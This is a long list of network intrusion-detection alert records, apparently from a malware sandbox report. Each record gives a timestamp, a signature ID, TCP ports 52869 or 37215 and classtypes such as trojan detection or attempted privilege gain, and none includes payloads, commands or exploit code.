                      Timestamp:07/20/24-23:06:41.431490
                      SID:2027339
                      Source Port:34348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.045159
                      SID:2025132
                      Source Port:49234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.936056
                      SID:2027339
                      Source Port:53480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.460726
                      SID:2025132
                      Source Port:56008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.531607
                      SID:2027339
                      Source Port:39154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.729283
                      SID:2027339
                      Source Port:52596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.820676
                      SID:2027339
                      Source Port:39628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:34800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.283476
                      SID:2831300
                      Source Port:55196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.953643
                      SID:2829579
                      Source Port:37320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.090928
                      SID:2027339
                      Source Port:42726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.185144
                      SID:2831300
                      Source Port:53174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.540434
                      SID:2831300
                      Source Port:56270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.373329
                      SID:2025132
                      Source Port:50342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.174161
                      SID:2027339
                      Source Port:59016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2835222
                      Source Port:34586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2829579
                      Source Port:36942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2831300
                      Source Port:48904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.501695
                      SID:2025132
                      Source Port:48326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.347525
                      SID:2027339
                      Source Port:41102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.123323
                      SID:2025132
                      Source Port:52258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.077998
                      SID:2027339
                      Source Port:47612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2829579
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2835222
                      Source Port:36540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:49468
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.194696
                      SID:2027339
                      Source Port:40958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.602644
                      SID:2027339
                      Source Port:43560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.565127
                      SID:2831300
                      Source Port:44414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.499893
                      SID:2835222
                      Source Port:41360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.478948
                      SID:2027339
                      Source Port:50466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.508900
                      SID:2831300
                      Source Port:58842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.761612
                      SID:2831300
                      Source Port:42518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.306292
                      SID:2025132
                      Source Port:53430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:41166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.156324
                      SID:2025132
                      Source Port:55580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.297601
                      SID:2025132
                      Source Port:47034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.833146
                      SID:2027339
                      Source Port:47204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2027339
                      Source Port:40852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.359038
                      SID:2831300
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2835222
                      Source Port:34148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.257528
                      SID:2025132
                      Source Port:38636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.435154
                      SID:2831300
                      Source Port:34310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:04.456849
                      SID:2025132
                      Source Port:49512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.260416
                      SID:2027339
                      Source Port:60722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2835222
                      Source Port:35072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.618622
                      SID:2027339
                      Source Port:33728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.842190
                      SID:2027339
                      Source Port:38212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2027339
                      Source Port:45530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.958012
                      SID:2027339
                      Source Port:56336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.250145
                      SID:2027339
                      Source Port:51916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.781031
                      SID:2027339
                      Source Port:49258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.333647
                      SID:2027339
                      Source Port:48186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.532549
                      SID:2027339
                      Source Port:38754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.013302
                      SID:2831300
                      Source Port:56170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2831300
                      Source Port:35852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.119354
                      SID:2027339
                      Source Port:52556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.259152
                      SID:2025132
                      Source Port:40430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.352260
                      SID:2025132
                      Source Port:42726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:58774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.296826
                      SID:2831300
                      Source Port:54696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.489738
                      SID:2027339
                      Source Port:60886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.032524
                      SID:2027339
                      Source Port:38386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2835222
                      Source Port:53142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.576731
                      SID:2025132
                      Source Port:57374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:53.235379
                      SID:2027339
                      Source Port:46914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.173548
                      SID:2025132
                      Source Port:54372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2829579
                      Source Port:43450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2027339
                      Source Port:40430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2027339
                      Source Port:54572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2835222
                      Source Port:34096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2829579
                      Source Port:48960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445004
                      SID:2027339
                      Source Port:50726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.406154
                      SID:2027339
                      Source Port:34404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.671380
                      SID:2831300
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.619944
                      SID:2025132
                      Source Port:38892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.545166
                      SID:2027339
                      Source Port:35250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.107735
                      SID:2835222
                      Source Port:48316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:36180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.363153
                      SID:2025132
                      Source Port:34748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.383428
                      SID:2831300
                      Source Port:57924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2831300
                      Source Port:51146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.587933
                      SID:2027339
                      Source Port:47874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556915
                      SID:2831300
                      Source Port:41514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2025132
                      Source Port:45810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2829579
                      Source Port:56972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.600216
                      SID:2835222
                      Source Port:55888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2831300
                      Source Port:35984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.510955
                      SID:2027339
                      Source Port:44144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2835222
                      Source Port:49760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.950361
                      SID:2027339
                      Source Port:38592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:48816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.249229
                      SID:2027339
                      Source Port:41114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.791970
                      SID:2025132
                      Source Port:32996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.813303
                      SID:2831300
                      Source Port:47876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.916755
                      SID:2027339
                      Source Port:41502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.893173
                      SID:2025132
                      Source Port:44930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.935568
                      SID:2027339
                      Source Port:39156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2027339
                      Source Port:41364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.340397
                      SID:2831300
                      Source Port:50244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.161619
                      SID:2027339
                      Source Port:48422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:51882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.857962
                      SID:2027339
                      Source Port:44356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.294828
                      SID:2025132
                      Source Port:34276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.625091
                      SID:2025132
                      Source Port:37846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.216159
                      SID:2025132
                      Source Port:48556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.127169
                      SID:2835222
                      Source Port:38306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.830942
                      SID:2025132
                      Source Port:56886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2027339
                      Source Port:51690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.445692
                      SID:2831300
                      Source Port:47516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2027339
                      Source Port:57798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.960851
                      SID:2027339
                      Source Port:35476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2831300
                      Source Port:46490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2831300
                      Source Port:55962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.714968
                      SID:2025132
                      Source Port:50866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2829579
                      Source Port:51442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.195370
                      SID:2025132
                      Source Port:45370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.213618
                      SID:2027339
                      Source Port:57930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.052390
                      SID:2027339
                      Source Port:34236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2829579
                      Source Port:35016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.202361
                      SID:2025132
                      Source Port:60200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:18.694959
                      SID:2025132
                      Source Port:37078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2831300
                      Source Port:46040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.658836
                      SID:2831300
                      Source Port:39428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.120599
                      SID:2835222
                      Source Port:36210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.997188
                      SID:2027339
                      Source Port:40842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.590112
                      SID:2829579
                      Source Port:48920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2027339
                      Source Port:40412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.141842
                      SID:2027339
                      Source Port:38632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.141369
                      SID:2831300
                      Source Port:53240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:30.714690
                      SID:2027339
                      Source Port:34356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:00.185152
                      SID:2027339
                      Source Port:54954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.200731
                      SID:2027339
                      Source Port:44168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.454459
                      SID:2025132
                      Source Port:40322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.042861
                      SID:2831300
                      Source Port:45878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.735063
                      SID:2831300
                      Source Port:51098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:55460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2835222
                      Source Port:49708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2027339
                      Source Port:53492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.182231
                      SID:2027339
                      Source Port:60894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.772858
                      SID:2027339
                      Source Port:46818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.680095
                      SID:2025132
                      Source Port:58684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.862638
                      SID:2831300
                      Source Port:47168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2835222
                      Source Port:40924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.082446
                      SID:2831300
                      Source Port:39042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.444445
                      SID:2831300
                      Source Port:42330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:32.610183
                      SID:2025132
                      Source Port:37576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2829579
                      Source Port:47068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.565663
                      SID:2831300
                      Source Port:60278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.322089
                      SID:2831300
                      Source Port:51336
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:60826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.296284
                      SID:2025132
                      Source Port:56418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.303827
                      SID:2025132
                      Source Port:52154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.835674
                      SID:2835222
                      Source Port:47002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2835222
                      Source Port:59492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2025132
                      Source Port:48022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.619304
                      SID:2027339
                      Source Port:54816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2025132
                      Source Port:58194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.486746
                      SID:2025132
                      Source Port:46426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.551203
                      SID:2027339
                      Source Port:56554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.664378
                      SID:2835222
                      Source Port:49980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:40564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2831300
                      Source Port:48554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.811024
                      SID:2831300
                      Source Port:40152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.147931
                      SID:2027339
                      Source Port:54690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:37.539445
                      SID:2027339
                      Source Port:49318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.261264
                      SID:2025132
                      Source Port:55544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2835222
                      Source Port:34342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.051223
                      SID:2829579
                      Source Port:57250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2027339
                      Source Port:42466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.394422
                      SID:2027339
                      Source Port:47538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.713951
                      SID:2831300
                      Source Port:33922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.324702
                      SID:2027339
                      Source Port:41818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.528818
                      SID:2831300
                      Source Port:37108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2027339
                      Source Port:35762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2831300
                      Source Port:46284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.815988
                      SID:2025132
                      Source Port:57374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.839791
                      SID:2027339
                      Source Port:47298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:55504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.740389
                      SID:2027339
                      Source Port:42998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:31.848052
                      SID:2027339
                      Source Port:45564
                      Destination Port:52869
